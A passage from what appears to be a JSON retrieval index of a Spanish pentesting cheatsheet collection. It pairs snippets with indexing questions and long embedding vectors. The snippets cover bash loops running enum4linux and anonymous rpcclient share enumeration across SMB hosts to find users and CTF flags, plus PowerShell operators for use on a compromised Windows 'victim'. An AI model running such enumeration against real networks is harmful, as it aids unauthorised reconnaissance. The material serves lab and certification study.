-0.07355, 0.01818, -0.11634, 0.0652, 0.01276, -0.02087, -0.02238, 0.03339, 0.05681, 0.02615, 0.01611, 0.02448]} -{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Enumerar SMB de todos y luego grep\n```bash\nfor ip in $(grep \"445/open\" smb.txt | cut -d' ' -f2); do enum4linux -a $ip < /dev/null > enum_$ip.txt 2>&1; done\ngrep -l \"alfred\" enum_*.txt # en QUΓ‰ host estΓ‘ el usuario\ngrep -iE 'remark|flag|OS\\{' enum_HOST.txt # flag en comentarios de shares\n```", "indexar": "que programa puedo usar para obtener informaciΓ³n detallada sobre los servicios compartidos de un host?", "v": [0.07376, 0.18299, -0.16316, -0.17739, 0.08406, -0.13192, 0.02058, -0.14485, -0.13415, -0.11297, -0.16348, -0.08848, -0.05913, -0.04741, -0.0514, -0.04183, 0.13943, -0.05415, 0.04633, 0.02905, 0.00489, 0.05239, -0.07191, -0.00387, -0.1136, 0.00051, 0.0753, -0.12644, -0.09129, 0.04585, 0.07865, -0.09639, -0.07266, -0.02177, -0.0174, -0.01425, 0.06505, 0.02905, 0.06047, -0.02271, 0.00628, -0.03339, -0.00204, 0.02082, 0.0968, 0.04499, -0.11337, -0.02009, -0.01277, -0.05667, -0.02633, -0.07546, -0.15043, -0.04968, -0.00592, -0.13404, 0.02803, -0.13347, -0.08915, 0.05452, 0.05629, -0.03562, -0.01008, 0.04757, 0.08054, -0.08362, 0.04229, 0.09358, -0.13336, 0.05511, -0.0395, 0.06365, 0.09254, -0.04628, -0.01712, 0.0333, -0.02847, -0.01156, 0.00087, -0.01905, -0.01282, 0.03932, -0.01274, 0.01728, -0.07517, -0.05316, 0.11209, -0.05543, -0.01311, -0.09304, 0.06371, 0.03131, -0.00948, 0.02017, 0.01392, -0.0577, 0.12228, 0.0471, 0.01774, 0.00561, 0.12213, 0.04325, -0.01805, 0.09867, -0.03867, 0.06494, 0.05761, -0.05813, -0.06715, -0.05092, 0.0158, 0.0489, -0.09103, -0.04464, -0.10238, -0.05616, -0.06574, -0.03079, 0.06941, -0.0336, -0.08813, 0.03031, 0.02855, 0.02569, 0.12647, -0.0248, -0.02136, 0.12583, -0.01748, 0.08863, -0.08644, 0.01706, -0.04329, -0.03934, -0.0007, -0.06688, 0.00071, -0.01995, 0.03883, 0.00427, 0.01685, 0.05116, 0.00282, 0.01419, -0.02393, -0.04162, 0.01485, -0.07467, -0.02224, 0.01909, 0.0235, 0.03453, -0.0092, -0.00252, -0.09673, -0.06025, 0.07619, -0.13588, -0.08745, 0.05654, -0.03342, -0.03113, -0.04854, -0.02303, 0.07809, -0.02931, 0.01792, -0.00462, 0.06907, 0.0945, -0.05523, 0.10636, -0.01323, -0.0627, -0.05806, 0.03236, -0.06634, -0.09337, -0.00353, -0.03172, -0.05073, 0.00094, -0.02017, 0.033, -0.00295, 0.03742, -0.02784, 0.01547, -0.02862, -0.04724, -0.01324, -0.02696, 0.06109, 0.02594, 0.00347, -0.08553, -0.05414, -0.03227, 0.06113, -0.0496, -0.10102, 0.0529, -0.00591, 0.02536, 0.04389, 0.01413, -0.02498, 0.02383, 0.02992, 0.09751, -0.00463, -0.06495, 0.07191, -0.04615, -0.03898, 0.01969, 0.01148, -0.0178, 0.01765, 0.0274, -0.01006, 0.03821, 0.00156, 0.00585, 0.08436, -0.07894, 0.08117, 0.04805, 0.05897, 0.0274, -0.00208, 0.01648, 0.01108, -0.0099, 0.0302, -0.02183, 0.00441, -0.02825, -0.0359, -0.0864, -0.01886, 0.11535, -0.01147, -0.05429, -0.03023, -0.01092, -0.06691, 0.02135, -0.01713, -0.03521, -0.00356, -0.02292, 0.08251, -0.06544, 0.02406, 0.05259]} -{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Enumerar SMB de todos y luego grep\n```bash\nfor ip in $(grep \"445/open\" smb.txt | cut -d' ' -f2); do enum4linux -a $ip < /dev/null > enum_$ip.txt 2>&1; done\ngrep -l \"alfred\" enum_*.txt # en QUΓ‰ host estΓ‘ el usuario\ngrep -iE 'remark|flag|OS\\{' enum_HOST.txt # flag en comentarios de shares\n```", "indexar": "como puedo enumerar SMB automΓ‘ticamente y luego analizar los resultados para encontrar usuarios o seΓ±ales?", "v": [0.04464, 0.14872, -0.13151, -0.13097, -0.02486, -0.11171, -0.16815, -0.17888, -0.19815, -0.08382, -0.09454, 0.01137, 0.12126, -0.1241, 0.12288, 0.09132, -0.06413, -0.14048, -0.00615, 0.05533, 0.12281, -0.08792, -0.11952, -0.0571, -0.02033, 0.02425, -0.01991, 0.02694, 0.0094, 0.04177, -0.01086, 0.01262, 0.10273, -0.08848, -0.11201, 0.00349, 0.00578, 0.01716, -0.01456, 0.13768, 0.02452, -0.00853, -0.07714, -0.13412, -0.00372, 0.02804, -0.09629, 0.07226, 0.0083, -0.13093, -0.03401, 0.04753, -0.12046, -0.07039, -0.075, -0.06189, 0.14562, -0.02368, 0.07455, -0.11854, 0.00176, -0.01945, 0.08415, 0.03164, 0.05721, 0.0604, 0.11292, 0.06017, -0.02736, 0.06439, -0.04208, 0.07994, -0.01982, 0.01138, 0.07098, 0.15171, -0.00594, 0.06671, 0.09463, 0.02589, -0.00205, -0.12606, -0.02378, 0.05305, -0.03155, -0.00178, -0.04528, -0.05607, 0.03641, -0.09085, 0.0107, 0.06807, 0.06588, 0.10506, 0.02265, -0.02891, -0.03123, -0.10003, 0.00775, 0.0124, 0.06292, -0.00843, -0.06434, 0.16326, 0.02565, 0.0161, 0.05273, -0.02576, -0.05906, -0.01157, 0.01898, -0.08432, 0.04638, -0.06987, -0.04685, 0.00403, -0.02411, -0.09415, -0.0127, 0.02168, 0.01647, 0.01972, -0.01725, -0.0362, -0.11076, -0.06493, 0.11619, -0.04691, 0.04829, -0.03046, 0.03455, 0.0564, -0.05422, -0.0468, -0.11114, 0.05761, -0.00949, -0.03569, -0.01396, 0.0141, -0.00207, 0.03825, -0.04925, -0.05852, 0.07404, -0.00262, -0.05229, -0.09578, -0.06629, -0.02113, 0.02788, 0.05854, -0.01309, -0.01378, 0.05773, 0.01265, 0.05012, -0.02367, -0.04948, 0.03935, -0.01084, -0.01767, -0.03136, 0.06665, 0.07163, -0.01821, 0.00798, -0.0098, 0.05824, -0.03613, -0.03905, -0.02035, -0.00483, -0.10508, 0.02612, -0.01205, 0.03079, -0.01178, -0.04274, -0.04002, 0.00992, -0.01124, 0.04052, -0.03301, -0.01284, -0.03729, 0.05469, -0.02265, 0.00626, 0.05397, -0.00814, 0.06669, -0.00911, -0.00622, -0.01983, -0.02348, 0.02024, -0.00216, -0.07907, -0.06103, -0.06272, 0.01466, -0.06066, 0.0293, 0.01896, 0.00879, -0.01743, 0.03012, 0.12168, -0.04081, -0.02038, -0.03469, 0.0875, -0.07823, -0.08853, -0.01118, 0.00756, -0.03933, -0.02067, 0.00273, 0.02716, 0.00656, 0.04343, 0.01201, -0.06055, 0.02035, -0.05882, 0.06217, 0.02686, 0.04908, -0.06139, 0.05385, -0.01153, 0.0326, 0.03156, -0.04739, -0.00176, -0.05245, -0.00391, -0.03781, 0.0019, -0.00176, -0.00029, 0.03087, -0.0617, -0.09049, -0.04078, -0.00264, -0.03926, -0.05534, 0.03325, 0.02513, 0.04199, -0.00491, 0.03891, -0.04062]} -{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Flags en comentarios de shares de toda la red\n```bash\nfor ip in $(grep \"445/open\" smb.txt | cut -d' ' -f2); do echo \"=== $ip ===\"; rpcclient -U \"\" -N $ip -c \"netshareenumall\" 2>/dev/null | grep -i \"flag\\|OS{\"; done\n```\n\nRelacionado: SMB Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "que herramienta sirve para revisar las flags en los shares de red?", "v": [0.07197, 0.00977, -0.1419, -0.25814, 0.08068, -0.16133, -0.17008, -0.07894, 0.11009, -0.11816, -0.10139, -0.18781, 0.01926, -0.16446, 0.18714, 0.03921, -0.02759, -0.01603, 0.05523, -0.03365, 0.02554, -0.04735, -0.12444, -0.08136, -0.04578, 0.07268, 0.05829, -0.05385, -0.11947, 0.0748, 0.02904, -0.02499, 0.03117, -0.02396, -0.15793, 0.00631, 0.03351, 0.06806, 0.02354, 0.03087, -0.04281, 0.11397, -0.10736, -0.0323, -0.00407, -0.07228, -0.03944, 0.0773, 0.03274, 0.08426, -0.01761, -0.10639, -0.12964, -0.01336, -0.07009, -0.124, 0.05406, -0.08204, -0.07504, -0.098, -0.099, -0.01501, 0.0022, -0.06582, -0.07422, -0.04331, -0.05617, -0.00387, -0.02053, 0.09349, -0.00141, 0.03441, -0.02233, -0.04418, -0.08279, -0.00321, 0.04723, -0.05624, 0.06648, -0.06766, 0.02916, -0.00228, -0.08964, 0.03161, 0.00184, -0.128, -0.03074, -0.05662, 0.01138, -0.06948, -0.03762, 0.0418, 0.07336, -0.04745, -0.04405, 0.0815, 0.07542, -0.05458, -0.0001, -0.06386, 0.16072, -0.08113, -0.0309, -0.02654, 0.00525, 0.03466, -0.09231, 0.02896, 0.02122, 0.05944, 0.08933, 0.00382, -0.00639, 0.01989, 0.05854, 0.00928, -0.01263, -0.04866, -0.04159, -0.0298, 0.04279, -0.03355, -0.05396, -0.0519, 0.06473, -0.0218, -0.07047, 0.0529, 0.0141, 0.00099, -0.05381, 0.02844, -0.04996, -0.02242, -0.08179, 0.0004, -0.04961, -0.13901, -0.03372, -0.03424, 0.03191, 0.073, -0.04271, -0.10441, 0.06397, 0.12547, 0.03113, -0.00728, -0.02497, 0.0391, 0.00887, -0.08335, -0.02022, -0.03146, -0.00521, 0.02676, 0.0145, 0.03233, -0.09361, 0.06523, -0.05398, -0.11145, 0.00211, 0.0303, 0.00108, -0.02279, 0.01823, 0.01608, 0.10585, 0.00276, 0.02454, 0.06228, 0.01591, -0.03077, -0.04932, -0.02667, -0.06445, -0.00684, 0.00093, -0.0556, 0.03093, -0.02269, -0.01541, 0.00147, 0.05815, -0.08885, -0.03916, -0.00278, 0.06231, -0.00567, -0.00989, -0.04376, 0.02595, -0.01583, 0.05196, 0.07218, -0.01667, -0.0491, 0.0121, -0.02374, -0.04957, 0.02013, -0.07845, -0.05001, 0.05176, 0.01161, -0.00351, 0.04832, 0.01212, 0.02657, -0.00401, 0.0379, 0.0463, 0.03313, -0.04017, -0.04239, 0.04026, 0.06994, 0.02705, -0.03787, 0.07088, 0.0131, -0.02101, -0.00997, -0.06398, 0.04084, -0.01732, -0.06367, 0.01323, -0.00591, 0.06115, 0.02796, -0.00305, 0.07632, -0.02708, -0.08551, 0.03921, 0.04044, -0.03574, -0.0467, -0.02313, 0.01755, -0.00566, -0.01204, 0.00014, -0.03595, 0.0086, -0.06179, 0.00516, -0.03228, -0.04275, -0.02875, 0.05353, -0.03149, 0.01641, -0.01623]} -{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Flags en comentarios de shares de toda la red\n```bash\nfor ip in $(grep \"445/open\" smb.txt | cut -d' ' -f2); do echo \"=== $ip ===\"; rpcclient -U \"\" -N $ip -c \"netshareenumall\" 2>/dev/null | grep -i \"flag\\|OS{\"; done\n```\n\nRelacionado: SMB Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "como puedo ver la informacion del sistema operativo desde un share smb?", "v": [0.01826, 0.02439, -0.1437, -0.09334, -0.116, -0.19983, -0.15459, -0.29969, -0.1247, -0.01799, -0.1243, -0.06753, 0.23338, -0.10473, 0.03297, 0.08183, 0.05811, -0.11651, -0.06104, -0.05373, 0.03657, -0.01416, 0.04926, 0.03221, -0.09051, 0.08081, -0.12962, -0.02925, -0.10536, -0.04079, -0.02633, -0.0701, 0.10829, -0.00586, -0.00943, 0.01496, 0.01963, 0.03543, 0.09658, -0.02128, -0.02413, -0.10946, 0.00414, 0.07567, 0.14569, -0.04417, -0.0089, -0.04361, -0.00332, -0.13926, -0.11284, 0.01284, -0.15043, -0.0648, -0.08421, -0.13074, 0.03858, -0.04233, 0.00033, 0.00165, 0.0183, 0.03717, -0.00821, -0.10484, 0.03943, -0.059, 0.04364, 0.0725, 0.03336, 0.10457, 0.00222, 0.08178, 0.10754, 0.07836, -0.03101, 0.0061, 0.1048, 0.04549, 0.02561, -0.0272, 0.06966, 0.01404, -0.07324, 0.06559, 0.03788, -0.12269, 0.07464, -0.07208, -0.05648, -0.03599, 0.01681, 0.01407, -0.00339, 0.07678, 0.01253, -0.03169, -0.03147, 0.01632, 0.01025, -0.01551, -0.00973, -0.03712, -0.08941, 0.04462, -0.05832, -0.10061, 0.0977, 0.0378, 0.05159, -0.05375, -0.01194, -0.02079, 0.00741, 0.01705, -0.04971, -0.014, -0.02683, -0.02688, -0.07989, -0.00459, -0.07117, 0.04523, 0.02349, -0.018, 0.02338, -0.02914, 0.0023, 0.13099, 0.00337, 0.03626, -0.01721, -0.00721, 0.05365, -0.04154, -0.00269, -0.00377, 5e-05, -0.00048, 0.05011, -0.02058, -0.04533, 0.05953, 0.06971, -0.04583, 0.01308, -0.00567, 0.04694, -0.11877, -0.00134, -0.1208, 0.05381, 0.03798, -0.05963, -0.05489, 0.06645, 0.02688, 0.02457, -0.03312, -0.05763, -0.01683, -0.0311, 0.0051, -0.05627, 0.0051, -0.07363, -0.01731, -0.04248, -0.04207, 0.05612, -0.02251, -0.05756, 0.05035, 0.07322, -0.07084, 0.03862, -0.00267, -0.07554, -0.00209, -0.00086, 0.03469, -0.08616, 0.05362, -0.03568, 0.02455, 0.0393, -0.04872, 0.00187, 0.06723, 0.00781, -0.00992, 0.03402, 0.02878, 0.00091, 0.01298, 0.01398, -0.00682, -0.0538, -0.02477, 0.04814, 0.00909, -0.05222, 0.02757, 0.02098, -0.08323, -0.00368, 0.0036, 0.0691, 0.06833, 0.00219, 0.05086, -0.00883, 0.00846, 0.04895, -0.06648, -0.08032, 0.01679, -0.02871, 0.03053, -0.00066, -0.07045, 0.05204, 0.07236, 0.05589, 0.03347, 0.00909, -0.04285, -0.01513, 0.02484, 0.00988, 0.00328, -0.00503, -0.0251, 0.03345, 0.02561, 0.06295, 0.00525, -0.04358, 0.01378, -0.01627, -0.02878, 0.01121, 0.04363, 0.03112, -0.08265, -0.04793, -0.00792, -0.07068, -0.0061, -0.03667, -0.09197, 0.02886, -0.02497, 0.01627, -0.06562, -0.04878, -0.0121]} -{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Flags en comentarios de shares de toda la red\n```bash\nfor ip in $(grep \"445/open\" smb.txt | cut -d' ' -f2); do echo \"=== $ip ===\"; rpcclient -U \"\" -N $ip -c \"netshareenumall\" 2>/dev/null | grep -i \"flag\\|OS{\"; done\n```\n\nRelacionado: SMB Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "con que programa monto la enumeracion de shares usando rpcclient?", "v": [0.03026, 0.00888, -0.09145, -0.2092, 0.07031, -0.11401, 0.0761, -0.04848, -0.15313, -0.11961, -0.04551, 0.00926, 0.08687, -0.12671, 0.00717, -0.05406, -0.03181, 0.01635, 0.07442, 0.05134, 0.00515, -0.05992, 0.01276, -0.0399, -0.07472, 0.1333, 0.01139, -0.10494, 0.09729, 0.02517, 0.20122, -0.09727, 0.02539, 0.00224, 0.02188, -0.0253, -0.00124, 0.02737, -0.03274, 0.03467, 0.06069, 0.00783, -0.1623, -0.08405, 0.06305, 0.00341, 0.05596, -0.02785, -0.0276, -0.0831, -0.10065, 0.02328, -0.16933, -0.00526, 0.01362, -0.08043, -0.0112, -0.05052, 0.08132, 0.03458, -0.03902, 0.10291, 0.03115, -0.02141, -0.04364, 0.02441, 0.01839, -0.00346, -0.11971, -0.03378, -0.05208, 0.02725, 0.08231, -0.00408, 0.1233, -0.00311, -0.00725, -0.0922, 0.10643, -0.13244, -0.14679, -0.0411, -0.00895, 0.04583, -0.0719, -0.01359, 0.12759, -0.044, 0.03091, 0.03689, 0.00239, 0.015, -0.04706, 0.04188, 0.02385, -0.07276, 0.16983, 0.03308, 0.00338, 0.0102, 0.0603, 0.00074, -0.10093, 0.07783, 0.01127, 0.07973, 0.05331, -0.09748, -0.06463, 0.0472, 0.00357, 0.0077, -0.05874, -0.03304, -0.06546, -0.06665, -0.06445, -0.07529, -0.01389, -0.08874, -0.03542, 0.00273, -0.08645, 0.03828, 0.03598, -0.03526, -0.05991, 0.19262, -0.08647, 0.01572, -0.0098, 0.04548, -0.0535, -0.05365, -0.06553, -0.05712, 0.04787, 0.0029, -0.00187, -0.03389, 0.03152, 0.09641, -0.02722, 0.02627, 0.13669, 0.03056, -0.00191, -0.10948, -0.10005, 0.04966, 0.07491, 0.05503, -0.05815, 0.01432, -0.02842, -0.02637, 0.05904, -0.0602, 0.00707, 0.10065, -0.0679, 0.0005, -0.00066, 0.01297, 0.05805, -0.08383, -0.04558, -0.00225, 0.07267, 0.02395, -0.02155, 0.08299, 0.02995, -0.02586, -0.05448, 0.00685, -0.05349, -0.0057, 0.01962, -0.00413, -0.11061, 0.04152, 0.07774, 0.07226, -0.04758, -0.04896, -0.04651, 0.01279, 0.02975, -0.02274, -0.04333, 0.03062, -0.07299, -0.00932, -0.0233, -0.04635, -0.02499, -0.04319, 0.04387, -0.00238, -0.05397, 0.02817, -0.07105, -0.02383, 0.06935, 0.07671, -0.06035, 0.10069, 0.01414, 0.07419, 0.05938, -0.00696, 0.09134, 0.01419, -0.02552, -0.03299, 0.00753, 0.06116, -0.024, 0.01364, 0.00375, 0.02102, 0.02873, 0.05252, -0.01932, 0.00074, 0.03381, 0.0311, 0.02569, 0.06815, -0.09196, 0.00308, 0.00722, -0.04897, 0.02901, -0.03037, 0.02184, -0.00662, -0.00258, -0.09453, 0.009, 0.03363, 1e-05, -0.04191, -0.07287, -0.01045, -0.05481, 0.04353, 0.03495, 0.01084, -0.03011, -0.00073, 0.00715, -0.07329, 0.01758, -0.03281]} -{"tipo": "pregunta", "herramienta": "Operadores PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Operadores PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Operadores PowerShell\n\n> Para cuando trabajas **dentro** de la vΓ­ctima Windows. Base de Port scanner PowerShell.\n\n```\n| tuberΓ­a (igual que bash) Get-Process | Where-Object {...}\n% alias de ForEach-Object 1..200 | % { ... }\n$_ el elemento actual del bucle 1..10 | % { \"puerto $_\" }\n-and -or -not (o !) lΓ³gicos\n-eq -ne igual / distinto ($x -eq 5)\n-lt -gt -le -ge menor/mayor (-igual) ($port -lt 1000)\n> redirige a fichero\n2>$null silenciar errores (= 2>/dev/null)\nOut-Null tirar salida no deseada $c.Connect(..) | Out-Null\n` backtick = continuar en lΓ­nea siguiente (como \\ en bash)\n; separar comandos en una lΓ­nea\n```", "indexar": "quΓ© herramientas de PowerShell puedo usar para hacer un escaneo de puertos?", "v": [-0.09485, -0.08115, -0.17502, -0.06537, -0.03457, -0.06459, 0.05492, -0.15088, -0.05109, -0.07131, -0.25078, 0.14426, -0.02699, -0.09836, -0.03893, 0.01495, 0.01339, -0.01625, 0.00262, 0.10464, -0.08968, 0.00588, -0.19266, -0.02349, -0.01947, 0.09719, 0.00561, 0.08892, -0.21511, 0.05834, -0.07451, 0.09597, 0.07701, -0.07544, -0.04338, -0.06172, -0.00193, 0.03628, 0.15755, 0.13049, -0.01026, 0.0901, -0.08413, -0.08271, 0.07097, -0.05181, -0.0498, -0.10863, -0.01128, 0.02351, -0.08829, -0.09971, -0.1421, -0.00788, 0.04147, -0.11749, 0.12475, -0.04496, -0.03149, -0.12916, -0.12995, 0.085, -0.03197, 0.04085, -0.12262, -0.06323, -0.06954, -0.04009, -0.10463, 0.09936, -0.11101, -0.01502, 0.06112, 0.01909, -0.00737, -0.05139, 0.04419, 0.01994, 0.03797, 0.00988, -0.03918, 0.02054, -0.09883, -0.07967, -0.08837, -0.02243, -0.0101, -0.07748, 0.00467, -0.11233, 0.0263, 0.01045, -0.00609, 0.05726, 0.04354, -0.00529, -0.00507, 0.04198, 0.0015, -0.00401, 0.10022, -0.05286, -0.0449, 0.07416, 0.02047, -0.02381, 0.00369, -0.02207, 0.0009, 0.02355, -0.0015, 0.06835, 0.0011, -0.01639, -0.03695, 0.04703, -0.03061, -0.17375, -0.03525, -0.00368, 0.05281, -0.04376, -0.01912, 0.00414, 0.0572, 0.00887, 0.04013, 0.05818, 0.05596, -0.01778, 0.03511, -0.07811, -0.05552, -0.06208, -0.02703, -0.06767, 0.0374, -0.11451, -0.03012, -0.07435, -0.05989, 0.0845, -0.11415, -0.0582, 0.00069, 0.0019, -0.02467, 0.00406, -0.05088, -0.01428, 0.07058, 0.00792, -0.03219, 0.04012, -0.04568, -0.02064, 0.08088, -0.00695, -0.05996, 0.00743, -0.05605, -0.01485, -0.00247, 0.05386, 0.03548, -0.08427, -0.03872, 0.01917, -0.04916, -0.00524, 0.05432, 0.14493, -0.00741, -0.0344, 0.05437, -0.00789, -0.02632, -0.02873, -0.09469, -0.01844, -0.02624, 0.06481, -0.04382, -0.03529, -0.01694, -0.00303, 0.00924, -0.09118, -0.00844, 0.10087, -0.04096, 0.02854, 0.02946, -0.07771, 0.0125, 0.01603, 0.03443, 0.00154, 0.00115, -0.05227, -0.00621, 0.02351, -0.02037, -0.04745, 0.06405, 0.01477, -0.09515, -0.01719, 0.00336, 0.02543, 0.04628, -0.00201, 0.07589, -0.01604, -0.01987, 0.00388, -0.03694, 0.03452, 0.00567, 0.05516, -0.03244, 0.02715, -0.02311, 0.02088, 0.01676, 0.06356, 0.02927, -0.02102, -0.01092, 0.0714, 0.03217, 0.00082, -0.05361, -0.02871, -0.02312, -0.02609, -0.00647, 0.01429, -0.02578, 0.03302, -0.00741, 0.01492, 0.01886, 0.02221, -0.01692, -0.03304, -0.03024, -0.00656, -0.03365, -0.02627, 0.00014, 0.01535, 0.0259, -0.03788, 0.00998, -0.02474]} -{"tipo": "pregunta", "herramienta": "Operadores PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Operadores PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Operadores PowerShell\n\n> Para cuando trabajas **dentro** de la vΓ­ctima Windows. Base de Port scanner PowerShell.\n\n```\n| tuberΓ­a (igual que bash) Get-Process | Where-Object {...}\n% alias de ForEach-Object 1..200 | % { ... }\n$_ el elemento actual del bucle 1..10 | % { \"puerto $_\" }\n-and -or -not (o !) lΓ³gicos\n-eq -ne igual / distinto ($x -eq 5)\n-lt -gt -le -ge menor/mayor (-igual) ($port -lt 1000)\n> redirige a fichero\n2>$null silenciar errores (= 2>/dev/null)\nOut-Null tirar salida no deseada $c.Connect(..) | Out-Null\n` backtick = continuar en lΓ­nea siguiente (como \\ en bash)\n; separar comandos en una lΓ­nea\n```", "indexar": "cΓ³mo filtro los procesos activos desde Windows usando PowerShell?", "v": [-0.06443, 0.0204, 0.03528, -0.19139, -0.01638, -0.06265, -0.00391, -0.12202, -0.07579, -0.07713, -0.06677, -0.02405, -0.07661, 0.00212, 0.00014, -0.0541, 0.01762, -0.11883, -0.01795, 0.005, -0.11471, -0.04677, -0.16394, -0.08909, -0.0091, 0.14714, 0.06711, 0.0362, -0.15677, -0.05795, 0.06282, -0.0047, 0.12783, -0.06474, -0.01847, 0.02251, -0.1705, 0.13938, 0.12709, 0.19448, -0.02767, 0.11684, -0.06288, 0.06601, 0.08917, -0.0085, -0.00647, -0.1964, -0.0005, -0.062, -0.09194, -0.0832, -0.10264, 0.03259, 0.07523, -0.12113, 0.04173, -0.10525, 0.00641, -0.03986, -0.04291, 0.16909, 0.00783, 0.06679, -0.06249, -0.08644, 0.05728, -0.1007, -0.02383, 0.18794, -0.07649, -0.04631, 0.05698, -0.00755, 0.09353, 0.05097, 0.11973, -0.07475, 0.00266, 0.00549, -0.03553, 0.03489, 0.00453, -0.02063, -0.07226, -0.10434, -0.00741, -0.07157, -0.00395, -0.09822, 0.03259, -0.05605, -0.04809, 0.10541, 0.01989, 0.00275, -0.03806, 0.01292, 0.01494, 0.05187, 0.00739, -0.10865, -0.05931, 0.11409, 0.05162, 0.03073, 0.02935, -0.03677, -0.11548, -0.06582, -0.03588, 0.04752, 0.01222, -0.01741, 0.03164, 0.11808, 0.01615, -0.18271, -0.05641, 0.03755, -0.02164, 0.03333, -0.06583, -0.02408, 0.08798, -0.04727, 0.03702, 0.04762, -0.01961, -0.01813, 0.01374, 0.03838, -0.03241, -0.05955, -0.09654, -0.03974, 0.00542, 0.0704, -0.02169, -0.17261, 0.03429, 0.07845, 0.0432, 0.02235, 0.05945, -0.01303, 0.0689, 0.032, -0.01075, 0.01129, 0.09021, -0.06381, -0.03469, -0.00162, -0.05935, -0.0118, 0.01547, 0.013, -0.03027, -0.03068, -0.05809, 0.03404, -0.0058, 0.0224, 0.02669, 0.0395, -0.06115, 0.00833, -0.01526, -0.08521, 0.01874, 0.0267, 0.00836, -0.03642, 0.02147, 0.04788, 0.04191, -0.00774, -0.00376, -0.0054, -0.03469, 0.00549, 0.01084, -0.01778, -0.04967, 0.04529, -0.02429, -0.01584, -0.03814, 0.01414, -0.06431, -0.00506, 0.01061, -0.08127, 0.07467, 0.00471, -0.0614, -0.06298, 0.03019, -0.05007, -0.02081, 0.0052, 0.00447, -0.00966, 0.06386, 0.04478, -0.01774, 0.02372, 0.02385, 0.00226, 0.02606, 0.02623, 0.08021, 0.01574, -0.04701, -0.03377, 0.02398, -0.03025, -0.00053, 0.01414, -0.00764, 0.02931, 0.01842, 0.01233, 0.02638, -0.02644, -0.04, -0.03076, -0.0057, 0.03917, 0.00636, 0.05151, -0.04815, 0.01652, 0.01278, -0.0014, -0.00741, 9e-05, -0.03232, 0.00458, 0.01312, -5e-05, 0.03615, -0.02945, -0.06355, 0.01072, -0.03902, -0.00773, 0.01651, -0.05199, 0.01597, -0.06109, 0.01674, -0.03851, -0.01536, -0.01517]} -{"tipo": "pregunta", "herramienta": "Operadores PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Operadores PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Operadores PowerShell\n\n> Para cuando trabajas **dentro** de la vΓ­ctima Windows. Base de Port scanner PowerShell.\n\n```\n| tuberΓ­a (igual que bash) Get-Process | Where-Object {...}\n% alias de ForEach-Object 1..200 | % { ... }\n$_ el elemento actual del bucle 1..10 | % { \"puerto $_\" }\n-and -or -not (o !) lΓ³gicos\n-eq -ne igual / distinto ($x -eq 5)\n-lt -gt -le -ge menor/mayor (-igual) ($port -lt 1000)\n> redirige a fichero\n2>$null silenciar errores (= 2>/dev/null)\nOut-Null tirar salida no deseada $c.Connect(..) | Out-Null\n` backtick = continuar en lΓ­nea siguiente (como \\ en bash)\n; separar comandos en una lΓ­nea\n```", "indexar": "cuΓ‘l es la tuberΓ­a equivalente al for loop en PowerShell?", "v": [0.02436, -0.06846, -0.01634, 0.06694, -0.0489, 0.01338, 0.05448, 0.04055, 0.05948, 0.04358, -0.29689, 0.04799, 0.12577, 0.15048, -0.05854, -0.05082, -0.04464, -0.09137, -0.0088, -0.01715, -0.07445, 0.00824, -0.28881, -0.07772, -0.0032, 0.05848, -0.01943, -0.0058, -0.08131, -0.07477, 0.00615, 0.02995, 0.05102, -0.1065, -0.07483, 0.16839, 0.01548, 0.09694, 0.0173, 0.13895, -0.04681, 0.04116, -0.12342, -0.00755, -0.07527, -0.10977, -0.01964, -0.06385, -0.01722, -0.06437, -0.15846, 0.10529, -0.11386, -0.06597, 0.06542, -0.13304, 0.04726, -0.00125, -0.00349, -0.06158, -0.03084, 0.02031, -0.02614, -0.05092, -0.07886, 0.01833, -0.10561, -0.10285, -0.06015, -0.0377, -0.10667, 0.03241, -0.11543, 0.04649, -0.02558, 0.05262, 0.09901, 0.01346, -0.00251, 0.06656, 0.09109, -0.00231, -0.02308, -0.063, 0.01727, 0.03487, 0.01222, -0.05841, 0.04574, -0.01728, 0.01429, 0.04008, -0.04676, 0.11517, 0.0239, -0.09596, -0.01193, 0.16261, -0.1003, -0.05868, 0.03297, -0.04741, -0.05862, 0.0907, 0.11191, -0.01502, -0.02325, 0.00155, 0.01208, -0.01439, -0.0891, 0.0856, -0.02263, -0.04193, 0.00919, 0.04514, -0.02233, -0.12461, -0.07516, -0.02161, 0.00376, 0.03447, -0.0413, -0.02788, 0.05928, 0.08197, 0.01773, 0.01609, 0.12571, 0.01685, 0.01408, 0.04399, 0.04316, -0.03469, -0.02805, -0.01784, -0.08481, 0.05655, -0.02376, -0.04028, -0.01825, 0.04449, 0.05727, -0.01565, 0.02088, -0.01856, 0.00963, -0.07002, -0.00194, 0.0438, -0.00857, 0.06012, 0.00446, 0.10988, 0.01225, -0.06028, -0.03339, -0.07445, -0.05437, 0.03536, -0.01939, -0.02853, -0.00145, 0.03915, 0.00306, -0.0299, -0.09197, -0.05474, 0.05568, -0.04448, 0.01296, 0.06894, -0.04205, 0.01898, 